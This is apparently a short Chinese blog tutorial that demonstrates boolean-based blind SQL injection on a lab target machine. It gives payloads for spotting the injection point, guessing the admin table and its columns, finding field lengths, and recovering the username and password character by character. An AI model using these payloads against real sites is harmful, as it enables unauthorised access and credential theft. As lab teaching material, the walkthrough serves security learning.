标签:div top mamicode board clipboard str 用户 com alt
(利用靶机演示)
第一步:判断注入点
‘报错存在注入的可能,and 1=1 、and 1=2一个返回正常,一个不正常,绝大多数存在注入
示例:
加‘,返回异常:
加 and 1=1,返回正常:
加 and 1=2,返回异常:
第二步:猜解表名
判断是否存在admin表,and exists(select * from admin)
返回正常,存在admin表
第三步:猜解字段
and exists(select admin from admin)
存在admin字段
and exists(select password from admin)
存在password字段
第三步猜解用户名与密码长度
and (select top 1 len(admin) from admin)>1
and (select top 1 len(password) from admin)>1
用户名长度为5,密码长度为16
第四步:折半猜解用户名密码
97为a
100为d
109为m
同理,可得用户名为admin,密码同理
标签:div top mamicode board clipboard str 用户 com alt
原文地址:https://www.cnblogs.com/wuchangyu/p/14400062.html
